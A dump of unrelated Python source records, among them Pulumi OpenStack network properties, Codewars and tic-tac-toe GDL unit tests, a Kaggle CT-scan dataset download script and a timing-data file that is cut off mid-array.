    def description(self) -> pulumi.Output[Optional[str]]:
        """
        Human-readable description of the network. Changing this updates the
        description of the existing network.
""" return pulumi.get(self, "description") @property @pulumi.getter(name="dnsDomain") def dns_domain(self) -> pulumi.Output[str]: """ The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. """ return pulumi.get(self, "dns_domain") @property @pulumi.getter def external(self) -> pulumi.Output[bool]: """ Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. """ return pulumi.get(self, "external") @property @pulumi.getter def mtu(self) -> pulumi.Output[int]: """ The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. """ return pulumi.get(self, "mtu") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the network. Changing this updates the name of the existing network. """ return pulumi.get(self, "name") @property @pulumi.getter(name="portSecurityEnabled") def port_security_enabled(self) -> pulumi.Output[bool]: """ Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. """ return pulumi.get(self, "port_security_enabled") @property @pulumi.getter(name="qosPolicyId") def qos_policy_id(self) -> pulumi.Output[str]: """ Reference to the associated QoS policy. """ return pulumi.get(self, "qos_policy_id") @property @pulumi.getter def region(self) -> pulumi.Output[str]: """ The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. """ return pulumi.get(self, "region") @property @pulumi.getter def segments(self) -> pulumi.Output[Optional[Sequence['outputs.NetworkSegment']]]: """ An array of one or more provider segment objects. """ return pulumi.get(self, "segments") @property @pulumi.getter def shared(self) -> pulumi.Output[bool]: """ Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. """ return pulumi.get(self, "shared") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Sequence[str]]]: """ A set of string tags for the network. """ return pulumi.get(self, "tags") @property @pulumi.getter(name="tenantId") def tenant_id(self) -> pulumi.Output[str]: """ The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. """ return pulumi.get(self, "tenant_id") @property @pulumi.getter(name="transparentVlan") def transparent_vlan(self) -> pulumi.Output[bool]: """ Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. """ return pulumi.get(self, "transparent_vlan") @property @pulumi.getter(name="valueSpecs") def value_specs(self) -> pulumi.Output[Optional[Mapping[str, Any]]]: """ Map of additional options. 
""" return pulumi.get(self, "value_specs")
[per-file quality-signal values omitted: line-length statistics, alphanumeric fraction, n-gram duplication rates, and related dataset metrics]
--- next file record ---
hexsha: af118a2888bdee390e6a737f34f366d1752d0b00 | size: 51 bytes | ext: py | lang: Python
path: pkgs/constructor-2.1.1-py37_0/info/test/run_test.py
repo: AXGKl/be_black @ 810df50ab33fe614786af5dc8216daff74db32df | licenses: ["BSD-3-Clause"]
stars: null | issues: 1 (2019-04-02T23:35:13.000Z) | forks: null
print("import: 'constructor'") import constructor
[per-file quality-signal values omitted: line-length statistics, alphanumeric fraction, n-gram duplication rates, and related dataset metrics]
--- next file record ---
hexsha: af68e7843b7fd079fb421a58aae4d3b126674538 | size: 379 bytes | ext: py | lang: Python
path: exponentcode.py
repo (stars): shyed2001/Python_Programming @ 93ef958e3d8aa77f9191b550972235ce4fe4a6cb | licenses: ["bzip2-1.0.6"]
repo (issues/forks): shyed2001/python-learning-basics @ same commit | licenses: ["bzip2-1.0.6"]
stars: 2 (2019-05-01T04:32:14.000Z to 2019-05-04T11:28:18.000Z) | issues: null | forks: null
print('''
Exponent code
Exponent code
''')

print('''
def answer2(number, power):
    result = 1
    for index in range(power):
        result = result * number
    return result
print(answer2(3, 2))
''')

print('''
''')

def answer2(number, power):
    result = 1
    for index in range(power):
        result = result * number
    return result

print(answer2(3, 2))
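`answer2` multiplies `number` into the result `power` times, so it costs O(power) multiplications. For large exponents, exponentiation by squaring does the same job in O(log power) steps; a small sketch (the name `fast_pow` is ours, not from the file):

```python
def fast_pow(base, exponent):
    # Exponentiation by squaring: O(log exponent) multiplications.
    result = 1
    while exponent > 0:
        if exponent & 1:      # odd exponent: fold one factor into the result
            result *= base
        base *= base          # square the base
        exponent >>= 1        # halve the exponent
    return result

assert fast_pow(3, 2) == 9 == answer2(3, 2)
```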
[per-file quality-signal values omitted: line-length statistics, alphanumeric fraction, n-gram duplication rates, and related dataset metrics]
--- next file record ---
hexsha: af8163d87a4994839a814645823e1622a6cf164b | size: 1,530 bytes | ext: py | lang: Python
path: python/kyu_5/test_extract_the_domain_name_from_a_url.py
repo: fkandzia/codewars @ b80fd200ce75e938bc4fd2313e28de6a34c46e71 | licenses: ["BSD-2-Clause"]
stars: null | issues: null | forks: null
import pytest

from python.kyu_5.extract_the_domain_name_from_a_url import domain_name, domain_name_2


class TestDomainName:
    @pytest.mark.parametrize(
        ("url", "domain"), [
            ("http://github.com/carbonfive/raygun", "github"),
            ("http://www.zombie-bites.com", "zombie-bites"),
            ("https://www.cnet.com", "cnet"),
            ("http://google.com", "google"),
            ("http://google.co.jp", "google"),
            ("https://youtube.com", "youtube"),
            ("www.xakep.ru", "xakep"),
            ("google.com", "google")
        ])
    def test_valid_url_should_return_domain_name(self, url, domain):
        assert domain_name(url) == domain

    def test_url_without_protocol_should_return_None(self):
        assert domain_name("Lorem ipsum") is None


class TestDomainName2:
    @pytest.mark.parametrize(
        ("url", "domain"), [
            ("http://github.com/carbonfive/raygun", "github"),
            ("http://www.zombie-bites.com", "zombie-bites"),
            ("https://www.cnet.com", "cnet"),
            ("http://google.com", "google"),
            ("http://google.co.jp", "google"),
            ("https://youtube.com", "youtube"),
            ("www.xakep.ru", "xakep"),
            ("google.com", "google")
        ])
    def test_valid_url_should_return_domain_name(self, url, domain):
        assert domain_name_2(url) == domain

    def test_url_without_protocol_should_return_None(self):
        assert domain_name_2("Lorem ipsum") is None
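The module under test, `extract_the_domain_name_from_a_url`, is not part of this dump; a hypothetical `domain_name` that would satisfy the parametrized cases above could look like the following. The regex approach is an assumption, not the kata author's solution:

```python
import re


def domain_name(url):
    # Drop an optional scheme and a leading "www.", then take the first dotted label.
    match = re.match(r"(?:https?://)?(?:www\.)?([^./]+)\.", url)
    return match.group(1) if match else None


assert domain_name("http://github.com/carbonfive/raygun") == "github"
assert domain_name("www.xakep.ru") == "xakep"
assert domain_name("Lorem ipsum") is None   # no dot, no scheme: no domain
```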
[per-file quality-signal values omitted: line-length statistics, alphanumeric fraction, n-gram duplication rates, and related dataset metrics]
--- next file record ---
hexsha: bb61e1c68b7e76aa760936bce2e47a9dfe5336fc | size: 13,553 bytes | ext: py | lang: Python
path: pyhsfc/test/pyhsfc-tictactoe-test.py
repo: AbdallahS/ggp-hsfc @ 3f2b80382f3ae8558553da07f1de5bdf5a143832 | licenses: ["BSD-2-Clause"]
stars: 1 (2019-02-01T04:46:20.000Z) | issues: null | forks: null
#!/usr/bin/env python

import re
import unittest
from pyhsfc import *

#-------------------------------------------------------------
# Tictactoe GDL from Stanford
#-------------------------------------------------------------
g_ttt1 = """
;;; Tictactoe

;;; Components
(role white) (role black)
(<= (base (cell ?m ?n x)) (index ?m) (index ?n))
(<= (base (cell ?m ?n o)) (index ?m) (index ?n))
(<= (base (cell ?m ?n b)) (index ?m) (index ?n))
(base (control white)) (base (control black))
(<= (input ?r (mark ?m ?n)) (role ?r) (index ?m) (index ?n))
(<= (input ?r noop) (role ?r))
(index 1) (index 2) (index 3)

;;; init
(init (cell 1 1 b)) (init (cell 1 2 b)) (init (cell 1 3 b))
(init (cell 2 1 b)) (init (cell 2 2 b)) (init (cell 2 3 b))
(init (cell 3 1 b)) (init (cell 3 2 b)) (init (cell 3 3 b))
(init (control white))

;;; legal
(<= (legal ?w (mark ?x ?y)) (true (cell ?x ?y b)) (true (control ?w)))
(<= (legal white noop) (true (control black)))
(<= (legal black noop) (true (control white)))

;;; next
(<= (next (cell ?m ?n x)) (does white (mark ?m ?n)) (true (cell ?m ?n b)))
(<= (next (cell ?m ?n o)) (does black (mark ?m ?n)) (true (cell ?m ?n b)))
(<= (next (cell ?m ?n ?w)) (true (cell ?m ?n ?w)) (distinct ?w b))
(<= (next (cell ?m ?n b)) (does ?w (mark ?j ?k)) (true (cell ?m ?n b)) (distinct ?m ?j))
(<= (next (cell ?m ?n b)) (does ?w (mark ?j ?k)) (true (cell ?m ?n b)) (distinct ?n ?k))
(<= (next (control white)) (true (control black)))
(<= (next (control black)) (true (control white)))
(<= (row ?m ?x) (true (cell ?m 1 ?x)) (true (cell ?m 2 ?x)) (true (cell ?m 3 ?x)))
(<= (column ?n ?x) (true (cell 1 ?n ?x)) (true (cell 2 ?n ?x)) (true (cell 3 ?n ?x)))
(<= (diagonal ?x) (true (cell 1 1 ?x)) (true (cell 2 2 ?x)) (true (cell 3 3 ?x)))
(<= (diagonal ?x) (true (cell 1 3 ?x)) (true (cell 2 2 ?x)) (true (cell 3 1 ?x)))
(<= (line ?x) (row ?m ?x)) (<= (line ?x) (column ?m ?x)) (<= (line ?x) (diagonal ?x))
(<= open (true (cell ?m ?n b)))

;;; goal
(<= (goal white 100) (line x) (not (line o)))
(<= (goal white 50) (not (line x)) (not (line o)))
(<= (goal white 0) (not (line x)) (line o))
(<= (goal black 100) (not (line x)) (line o))
(<= (goal black 50) (not (line x)) (not (line o)))
(<= (goal black 0) (line x) (not (line o)))

;;; terminal
(<= terminal (line x)) (<= terminal (line o)) (<= terminal (not open))
"""

#----------------------------------------------------------
# Tictactoe that is generated by the Dresden game controller
#----------------------------------------------------------
g_ttt2 = """(ROLE WHITE) (ROLE BLACK) (<= (BASE (CELL ?M ?N X)) (INDEX ?M) (INDEX ?N)) (<= (BASE (CELL ?M ?N O)) (INDEX ?M) (INDEX ?N)) (<= (BASE (CELL ?M ?N B)) (INDEX ?M) (INDEX ?N)) (BASE (CONTROL WHITE)) (BASE (CONTROL BLACK)) (<= (INPUT ?R (MARK ?M ?N)) (ROLE ?R) (INDEX ?M) (INDEX ?N)) (<= (INPUT ?R NOOP) (ROLE ?R)) (INDEX 1) (INDEX 2) (INDEX 3) (INIT (CELL 1 1 B)) (INIT (CELL 1 2 B)) (INIT (CELL 1 3 B)) (INIT (CELL 2 1 B)) (INIT (CELL 2 2 B)) (INIT (CELL 2 3 B)) (INIT (CELL 3 1 B)) (INIT (CELL 3 2 B)) (INIT (CELL 3 3 B)) (INIT (CONTROL WHITE)) (<= (LEGAL ?W (MARK ?X ?Y)) (TRUE (CELL ?X ?Y B)) (TRUE (CONTROL ?W))) (<= (LEGAL WHITE NOOP) (TRUE (CONTROL BLACK))) (<= (LEGAL BLACK NOOP) (TRUE (CONTROL WHITE))) (<= (NEXT (CELL ?M ?N X)) (DOES WHITE (MARK ?M ?N)) (TRUE (CELL ?M ?N B))) (<= (NEXT (CELL ?M ?N O)) (DOES BLACK (MARK ?M ?N)) (TRUE (CELL ?M ?N B))) (<= (NEXT (CELL ?M ?N ?W)) (TRUE (CELL ?M ?N ?W)) (DISTINCT ?W B)) (<= (NEXT (CELL ?M ?N B)) (DOES ?W (MARK ?J ?K)) (TRUE (CELL ?M ?N B)) (DISTINCT ?M ?J)) (<= (NEXT (CELL ?M ?N B)) (DOES ?W (MARK ?J ?K)) (TRUE (CELL ?M ?N B)) (DISTINCT ?N ?K)) (<= (NEXT (CONTROL WHITE)) (TRUE (CONTROL BLACK))) (<= (NEXT (CONTROL BLACK)) (TRUE (CONTROL WHITE))) (<= (ROW ?M ?X) (TRUE (CELL ?M 1 ?X)) (TRUE (CELL ?M 2 ?X)) (TRUE (CELL ?M 3 ?X))) (<= (COLUMN ?N ?X) (TRUE (CELL 1 ?N ?X)) (TRUE (CELL 2 ?N ?X)) (TRUE (CELL 3 ?N ?X))) (<= (DIAGONAL ?X) (TRUE (CELL 1 1 ?X)) (TRUE (CELL 2 2 ?X)) (TRUE (CELL 3 3 ?X))) (<= (DIAGONAL ?X) (TRUE (CELL 1 3 ?X)) (TRUE (CELL 2 2 ?X)) (TRUE (CELL 3 1 ?X))) (<= (LINE ?X) (ROW ?M ?X)) (<= (LINE ?X) (COLUMN ?M ?X)) (<= (LINE ?X) (DIAGONAL ?X)) (<= OPEN (TRUE (CELL ?M ?N B))) (<= (GOAL WHITE 100) (LINE X) (NOT (LINE O))) (<= (GOAL WHITE 50) (NOT (LINE X)) (NOT (LINE O))) (<= (GOAL WHITE 0) (NOT (LINE X)) (LINE O)) (<= (GOAL BLACK 100) (NOT (LINE X)) (LINE O)) (<= (GOAL BLACK 50) (NOT (LINE X)) (NOT (LINE O))) (<= (GOAL BLACK 0) (LINE X) (NOT (LINE O))) (<= TERMINAL (LINE X)) (<= TERMINAL (LINE O)) (<= TERMINAL (NOT OPEN))"""

#----------------------------------------------------------
# Tictactoe generated by the Dresden game controller but with line breaks added
#----------------------------------------------------------
g_ttt3 = """
(ROLE WHITE) (ROLE BLACK)
(<= (BASE (CELL ?M ?N X)) (INDEX ?M) (INDEX ?N)) (<= (BASE (CELL ?M ?N O)) (INDEX ?M) (INDEX ?N)) (<= (BASE (CELL ?M ?N B)) (INDEX ?M) (INDEX ?N))
(BASE (CONTROL WHITE)) (BASE (CONTROL BLACK))
(<= (INPUT ?R (MARK ?M ?N)) (ROLE ?R) (INDEX ?M) (INDEX ?N)) (<= (INPUT ?R NOOP) (ROLE ?R))
(INDEX 1) (INDEX 2) (INDEX 3)
(INIT (CELL 1 1 B)) (INIT (CELL 1 2 B)) (INIT (CELL 1 3 B)) (INIT (CELL 2 1 B)) (INIT (CELL 2 2 B)) (INIT (CELL 2 3 B)) (INIT (CELL 3 1 B)) (INIT (CELL 3 2 B)) (INIT (CELL 3 3 B)) (INIT (CONTROL WHITE))
(<= (LEGAL ?W (MARK ?X ?Y)) (TRUE (CELL ?X ?Y B)) (TRUE (CONTROL ?W))) (<= (LEGAL WHITE NOOP) (TRUE (CONTROL BLACK))) (<= (LEGAL BLACK NOOP) (TRUE (CONTROL WHITE)))
(<= (NEXT (CELL ?M ?N X)) (DOES WHITE (MARK ?M ?N)) (TRUE (CELL ?M ?N B))) (<= (NEXT (CELL ?M ?N O)) (DOES BLACK (MARK ?M ?N)) (TRUE (CELL ?M ?N B))) (<= (NEXT (CELL ?M ?N ?W)) (TRUE (CELL ?M ?N ?W)) (DISTINCT ?W B)) (<= (NEXT (CELL ?M ?N B)) (DOES ?W (MARK ?J ?K)) (TRUE (CELL ?M ?N B)) (DISTINCT ?M ?J)) (<= (NEXT (CELL ?M ?N B)) (DOES ?W (MARK ?J ?K)) (TRUE (CELL ?M ?N B)) (DISTINCT ?N ?K)) (<= (NEXT (CONTROL WHITE)) (TRUE (CONTROL BLACK))) (<= (NEXT (CONTROL BLACK)) (TRUE (CONTROL WHITE)))
(<= (ROW ?M ?X) (TRUE (CELL ?M 1 ?X)) (TRUE (CELL ?M 2 ?X)) (TRUE (CELL ?M 3 ?X))) (<= (COLUMN ?N ?X) (TRUE (CELL 1 ?N ?X)) (TRUE (CELL 2 ?N ?X)) (TRUE (CELL 3 ?N ?X))) (<= (DIAGONAL ?X) (TRUE (CELL 1 1 ?X)) (TRUE (CELL 2 2 ?X)) (TRUE (CELL 3 3 ?X))) (<= (DIAGONAL ?X) (TRUE (CELL 1 3 ?X)) (TRUE (CELL 2 2 ?X)) (TRUE (CELL 3 1 ?X)))
(<= (LINE ?X) (ROW ?M ?X)) (<= (LINE ?X) (COLUMN ?M ?X)) (<= (LINE ?X) (DIAGONAL ?X)) (<= OPEN (TRUE (CELL ?M ?N B)))
(<= (GOAL WHITE 100) (LINE X) (NOT (LINE O))) (<= (GOAL WHITE 50) (NOT (LINE X)) (NOT (LINE O))) (<= (GOAL WHITE 0) (NOT (LINE X)) (LINE O)) (<= (GOAL BLACK 100) (NOT (LINE X)) (LINE O)) (<= (GOAL BLACK 50) (NOT (LINE X)) (NOT (LINE O))) (<= (GOAL BLACK 0) (LINE X) (NOT (LINE O)))
(<= TERMINAL (LINE X)) (<= TERMINAL (LINE O)) (<= TERMINAL (NOT OPEN))"""

#----------------------------------------------------------
#
#----------------------------------------------------------
def get_joint_move(state, player2move_dict):
    # Find a legal joint move whose per-player moves match the given strings.
    for jm in state.joints():
        jms = {str(p): str(m) for (p, m) in jm.items()}
        if all(item in jms.items() for item in player2move_dict.items()):
            return jm
    return None

#----------------------------------------------------------
#
#----------------------------------------------------------
class TictactoeTest(unittest.TestCase):

    #-----------------------------
    # Test tictactoe from Stanford
    #-----------------------------
    def test_tictactoe1(self):
        global g_ttt1

        # Create game
        game = Game(gdl=g_ttt1)
        self.assertEqual(len(game.players()), 2)
        self.assertEqual(len(game.players()), game.num_players())
        white = next((r for r in game.players() if str(r) == "white"), None)
        black = next((r for r in game.players() if str(r) == "black"), None)
        self.assertTrue(white is not None)
        self.assertTrue(black is not None)

        # Track moves from the initial state to termination
        state = State(game)

        # Move 1
        jm = get_joint_move(state, {'white': '(mark 1 1)', 'black': 'noop'})
        self.assertTrue(jm is not None)
        print("Playing: {0}".format(jm))
        state.play(jm)
        self.assertFalse(state.is_terminal())

        # Move 2
        jm = get_joint_move(state, {'white': 'noop', 'black': '(mark 2 1)'})
        self.assertTrue(jm is not None)
        print("Playing: {0}".format(jm))
        state.play(jm)
        self.assertFalse(state.is_terminal())

        # Move 3
        jm = get_joint_move(state, {'white': '(mark 1 2)', 'black': 'noop'})
        self.assertTrue(jm is not None)
        print("Playing: {0}".format(jm))
        state.play(jm)
        self.assertFalse(state.is_terminal())

        # Move 4
        jm = get_joint_move(state, {'white': 'noop', 'black': '(mark 2 2)'})
        self.assertTrue(jm is not None)
        print("Playing: {0}".format(jm))
        state.play(jm)
        self.assertFalse(state.is_terminal())

        # Move 5
        jm = get_joint_move(state, {'white': '(mark 1 3)', 'black': 'noop'})
        self.assertTrue(jm is not None)
        print("Playing: {0}".format(jm))
        state.play(jm)
        self.assertTrue(state.is_terminal())

        # Test the goal scores
        gs = state.goals()
        print("Score: {0}".format(gs))
        self.assertEqual(gs[white], 100)
        self.assertEqual(gs[black], 0)

    #----------------------------------------------------------
    # Test tictactoe as produced by the Dresden gamecontroller
    #----------------------------------------------------------
    def test_tictactoe2(self):
        global g_ttt2, g_ttt3

        # Create game
        game = Game(gdl=g_ttt3)
        self.assertEqual(len(game.players()), 2)
        self.assertEqual(len(game.players()), game.num_players())
        white = next((r for r in game.players() if str(r) == "WHITE"), None)
        black = next((r for r in game.players() if str(r) == "BLACK"), None)
        self.assertTrue(white is not None)
        self.assertTrue(black is not None)

        # Track moves from the initial state to termination
        state = State(game)

        # Move 1
        jm = get_joint_move(state, {'WHITE': '(MARK 1 1)', 'BLACK': 'NOOP'})
        self.assertTrue(jm is not None)
        print("Playing: {0}".format(jm))
        state.play(jm)
        self.assertFalse(state.is_terminal())

        # Move 2
        jm = get_joint_move(state, {'WHITE': 'NOOP', 'BLACK': '(MARK 2 1)'})
        self.assertTrue(jm is not None)
        print("Playing: {0}".format(jm))
        state.play(jm)
        self.assertFalse(state.is_terminal())

        # Move 3
        jm = get_joint_move(state, {'WHITE': '(MARK 1 2)', 'BLACK': 'NOOP'})
        self.assertTrue(jm is not None)
        print("Playing: {0}".format(jm))
        state.play(jm)
        self.assertFalse(state.is_terminal())

        # Move 4
        jm = get_joint_move(state, {'WHITE': 'NOOP', 'BLACK': '(MARK 2 2)'})
        self.assertTrue(jm is not None)
        print("Playing: {0}".format(jm))
        state.play(jm)
        self.assertFalse(state.is_terminal())

        # Move 5
        jm = get_joint_move(state, {'WHITE': '(MARK 1 3)', 'BLACK': 'NOOP'})
        self.assertTrue(jm is not None)
        print("Playing: {0}".format(jm))
        state.play(jm)
        self.assertTrue(state.is_terminal())

        # Test the goal scores
        gs = state.goals()
        print("Score: {0}".format(gs))
        self.assertEqual(gs[white], 100)
        self.assertEqual(gs[black], 0)

#-----------------------------
# main
#-----------------------------
def main():
    unittest.main()

if __name__ == '__main__':
    main()
[per-file quality-signal values omitted: line-length statistics, alphanumeric fraction, n-gram duplication rates, and related dataset metrics]
--- next file record ---
hexsha: bb7e196ce7a1a0fe2d37f65e1115eec30f2076bb | size: 372 bytes | ext: py | lang: Python
path: load_datasets/load_sarscov2-ctscan-dataset.py
repo: ArthurMor4is/grad-cam-covid-19-ct @ 14474a635e7633c8382839582d2a2cd9ff98eb62 | licenses: ["MIT"]
stars: null | issues: null | forks: null
import os

# Download and organize the sarscov2-ctscan-dataset
os.system("kaggle datasets download -d plameneduardo/sarscov2-ctscan-dataset")
os.system("unzip sarscov2-ctscan-dataset.zip")
os.system("mkdir sarscov2-ctscan-dataset")
os.system("mv COVID sarscov2-ctscan-dataset")
os.system("mv non-COVID sarscov2-ctscan-dataset")
os.system("rm -rf sarscov2-ctscan-dataset.zip")
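`os.system` ignores non-zero exit codes, so a failed download or unzip goes unnoticed. A sketch of the same steps with `subprocess.run(..., check=True)` and `shutil`, which stop at the first failing step; the Kaggle dataset slug is taken from the script above, the rest of the structure is our choice:

```python
import shutil
import subprocess
from pathlib import Path

# check=True raises CalledProcessError if a step fails.
subprocess.run(["kaggle", "datasets", "download",
                "-d", "plameneduardo/sarscov2-ctscan-dataset"], check=True)
subprocess.run(["unzip", "sarscov2-ctscan-dataset.zip"], check=True)

Path("sarscov2-ctscan-dataset").mkdir(exist_ok=True)
for folder in ("COVID", "non-COVID"):
    shutil.move(folder, "sarscov2-ctscan-dataset/" + folder)
Path("sarscov2-ctscan-dataset.zip").unlink()
```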
[per-file quality-signal values omitted: line-length statistics, alphanumeric fraction, n-gram duplication rates, and related dataset metrics]
--- next file record ---
hexsha: bb8858db8d10e11e28ef734c0c49b5c1977c3c77 | size: 92,738 bytes | ext: py | lang: Python
path: tmp/timing.py
repo: kcarnold/sentiment-slant-gi18 @ 6028b42627e3eec14a1f27986f8925d8b1e6ad9c | licenses: ["MIT"]
stars: null | issues: null | forks: null
# -*- coding: utf-8 -*- """ Created on Tue Jun 13 13:55:21 2017 @author: kcarnold """ import json #%% # Baseline stats = ''' {"numInflight":0,"nosugg":[238,30,132,492,24,70,259,42,62,85,234,109,37,50,29,60,30,51,149,119,153,100,37,48,31,56,32,63,27,48,462,270,357,46,26,57,95,427,117,188,152,27,48,55,63,50,170,206,119,82,81,36,81,50,58,67,63,53,57,58,88,48,45,24,46,56,63,42,76,70,57,154,186,393,191,127,241,470,207,276,64,49,64,52,55,48,182,59,186,310,28,32,45,26,62,53,322,263,59,98,107,60,350,352,26,40,51,57,61,63,63,51,46,55,50,57,66,40,25,59,58,82,46,36,45,68,73,30,26,68,68,281,48,4,5,23,4,6,26,3,32,30,54,490,54,55,39,315,43,43,70,171,31,78,191,54,52,49,24,59,36,48,66,73,62,18,46,189,40,68,76,54,366,57,43,351,109,33,52,52,35,62,52,4,5,43,6,9,74,7,56,45,44,198,61,191,75,117,71,431,321,40,49,36,34,56,68,214,67,86,104,76,31,41,48,45,272,42,360,65,401,49,135,289,36,436,213,173,428,550,294,701,281,389,483,130,133,291,373,182,318,69,78,38,675,516,121,82,66,117,68,377,275,248,195,58,400,181,333,439,443,249,381,282,158,240,369,377,476,367,166,20,66,26,483,270,233,371,83,315,318,165,494,234,217,224,425,427,519,624,334,236,480,583,116,347,210,299,307,50,167,212,96,188,223,295,371,82,411,217,68,461,815,873,103,97,286,12,245,98,108,305,358,124,104,53,59,141,367,46,98,429,427,298,397,16,9,105,134,319,468,545,607,421,239,257,411,265,281,281,330,145,188,123,210,179,140,293,256,133,121,124,413,33,240,101,131,347,348,93,373,425,216,302,160,43,68,328,335,270,230,242,50,567,564,172,290,375,68,47,49,217,297,277,268,171,77,80,56,264],"diverse":[257,564,185,507,171,358,224,411,461,183,392,191,391,326,187,189,381,368,195,396,379,420,325,285,493,321,317,512,176,173,285,364,206,485,507,667,6,200,405,659,5,104,284,4,4,24,207,339,556,193,372,196,512,209,547,543,188,289,168,429,349,193,356,187,233,182,177,348,182,364,227,209,251,187,509,62,97,172,186,307,94,207,50,154,269,257,279,561,709,220,353,322,183,363,198,508,57,243,164,65,123,386,202,404,135,179,23,21,18,70,200,179,360,195,384,181,403,245,520,266,381,10,174,256,221,188,401,336,179,222,252,88,186,361,281,588,297,493,199,345,203,178,499,295,19,18,133,332,326,336,530,327,386,253,297,50,94,216,140,186,379,471,490,196,592,409,118,334,729,298,388,255,350,280,529,669,12,10,214,212,558,174,329,190,405,101,454,342,281,1040,457,317,911,929,342,378,201,458,451,424,528,313,88,366,636,303,497,5,516,349,461,330,327,228,432,553,488,323,322,254,426,540,407,411,272,184,180,256,305,366,246,258,512,322,168,204,67,455,59,337,4,8,420,193,188,509,511,487,313,249,328,189,248,449,536,539,199,497,517,94,364,329,107,6,55,188,317,378,460,325,199,72,112,137,96,125,478,65,84,69,268,399,352,348,262,364,436,681,211,428,309,453,345,495,328,516,353,335,303,464,290,289,533,415,368,465,368,220,115,374,423,339,431,581,295,338,216,482,786,399,492,339,403,383,139,515,380,365,369,366,267,573,259,495,330,492,369,336,253,354,504,311,286,582,570,346,225,135,486,129,473,563,441,421,349,186,513,310,106,87,614,559,320,432,438,446,232,371,204,408,511,473,335,66,350,96,346,423,876,418,501,113,103,247,94,287,185,209,258,353,94,201,373,293,253,96,96,69,107,215,360,273,106,257,375,137,143,359,212,75,190,131,15,184,141,516,49,241,264,176,109,297,161,356,228,198,169,716,388,231,427,227,208,359,116,597,222,470,238,90,92,175,411,236,336,195,419,333,231,143,479,479,224,210,176,191,246,241,290,390,409,348,222,255,31,406,181,30,8,11,184,100,130,49,255,231,328,344,166,233,676,676,198,326,214,307,597,597,228,266,373,264,273,168,229,437,341],"match":[262,176,365,237,199,380,184,364,183,351,171,357,460,531,440,178,388,1
94,232,356,353,308,203,393,171,509,328,192,378,172,344,381,272,167,339,344,311,699,543,261,294,452,221,409,305,41,174,524,181,33,364,200,425,610,233,373,24,229,252,314,54,93,178,341,279,262,209,400,253,244,491,180,368,200,230,418,164,480,289,570,177,382,184,130,275,208,395,207,518,460,901,909,690,379,381,202,379,308,175,352,210,414,76,263,245,326,36,329,354,193,523,316,37,211,221,384,213,203,556,327,394,313,479,225,305,216,387,460,220,428,63,110,307,273,516,132,44,233,179,354,188,362,251,275,428,390,436,173,362,164,344,380,170,352,190,362,319,523,187,192,387,201,168,253,185,361,193,383,26,44,190,366,104,244,307,178,357,411,327,260,277,493,511,215,468,179,375,195,382,212,229,481,355,312,383,210,417,482,307,291,526,207,209,383,133,312,210,460,182,347,275,177,368,110,169,325,289,524,38,81,224,523,264,53,320,42,271,64,318,612,234,27,197,366,203,348,398,478,700,190,484,588,551,191,374,91,87,178,650,598,41,70,232,534,192,385,190,174,389,174,356,4,3,2,3,2,53,67,47,359,316,195,481,345,294,248,291,219,292,47,278,210,402,194,450,64,271,28,202,175,347,219,537,236,375,460,307,82,365,309,176,355,215,229,405,209,275,191,252,225,91,412,201,384,140,175,188,568,350,543,543,170,424,332,438,718,52,75,162,348,169,375,174,224,250,473,199,467,174,421,214,518,204,342,184,345,191,341,218,184,255,276,176,350,192,367,267,276,292,414,175,355,252,209,185,504,238,364,312,169,355,409,331,182,369,34,60,156,319,173,364,187,417,230,302,305,617,434,192,184,362,197,248,202,306,208,379,196,377,330,417,207,268,395,166,200,679,509,312,317,330,426,667,568,197,379,387,253,250,240,216,216,577,482,582,490,247,341,266,271,196,303,81,126,287,586,310,201,346,212,353,293,44,91,290,428,191,345,584,562,590,40,91,216,366,255,317,269,330,423,337,327,886,370,229,38,81,523,540,199,418,546,216,460,303,284,348,295,234,191,353,60,224,136,414,272,347,272,342,771,1019,1041,1042,170,277,604,606,607,836,938,940,403,241,836,926,950,917,191,56,216,60,314,466,489,257,354,447,253,288,402,47,61,187,6,174,274,293,44,172,253,459,319,322,391,450,201,203,365,442,444,338,341,661,738,740,759,368,424,257,460,456,187,528,529,38,75,336,237,238,190,89,224,67,248,179,313,317,413,589,636,658,303,336,437,507,504,191,423,499,202,152,151,242,169,270,393,173,192,7,403,519,365,366,17,312,315,330,463,331,245,326,382,464,469,76,325,466,466,241,243,246,386,434,128,444,531,243,292,174,68,356,415,420,180,481,491,326,341,356,65,325,309,309,78,197,471,470,74,188,7,225,429,162,162,223,211,371,439,540,130,223,303,332,394,205,334,99,99,152,367,401,419,199,7,333,355,256,318,179,179,184,260,75,366,327,329,35,59,178,296,320,399,500,192,198,510,510,75,321,325,346,350,351,342,359,183,291,302,186,327,387,256,319,255,452,301,301,120,75,138,182,49,244,408,408,243,344,65,196,492,496,448,541,607,609,201,259,277,328,302,302,170,174,165,175,325,25,301,333,408,486,180,232,435,435,311,376,377,167,272,188,76,257,455,457,351,97,400,419,443,246,321,343,346,245,315,367,559,139,226,186,345,345,230,249,462,465,235,332,333,92,352,296,349,247,317,199,194,321,342,169,302,369,396,394,457,224,318,340,147,259,348,198,318,339,187,232,269,485,487,338,428,277,487,486,190,77,83,246,276,481,68,208,219,220,101,217,66,186,64,343,316,316,280,360,302,396,698,717,98,74,170,355,429,518,519,348,132,676,679,254,347,348,343,223,177,271,43,113,203,95,184,121,428,101,333,352,210,210,66,556,627,630,339,339,353,353,337,338,367,351,355,335,496,235,331,407,515,516,520,218,352,548,547,174,437,466,292,395,351,363,280,363,216,352,298,415,652,699,702,254,28,264,364,365,281,353,387,330,339,481,147,150,238,137,485,583,111,206,417,
